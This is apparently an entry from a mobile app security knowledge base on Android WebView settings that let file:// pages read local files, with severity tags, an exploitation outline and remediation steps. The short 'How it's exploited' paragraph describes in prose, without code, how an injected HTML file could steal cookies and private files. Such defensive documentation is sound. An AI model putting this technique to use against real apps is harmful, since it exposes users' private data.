PTKDMobile App Security
Knowledge base / PTKD-WEBVIEW-FILEACCESS
medium M4 MASVS-PLATFORM-2 static analysis PTKD-WEBVIEW-FILEACCESS

WebView allows file access from web content

setAllowUniversalAccessFromFileURLs / setAllowFileAccessFromFileURLs let remote pages read local files via file:// URLs.

How it's exploited

setAllowFileAccessFromFileURLs lets a file:// page read other local files via XHR. One injected HTML file (downloads, cache) can exfiltrate cookies databases and private files through the WebView.

Why it matters

Local-file boundary inside the app breaks; web content reads app-private storage.

How to fix it

  1. Set setAllowFileAccessFromFileURLs(false) and setAllowUniversalAccessFromFileURLs(false) (default on modern APIs; check legacy code).
  2. Serve packaged content via WebViewAssetLoader over https:// app assets instead of file:// URLs.

References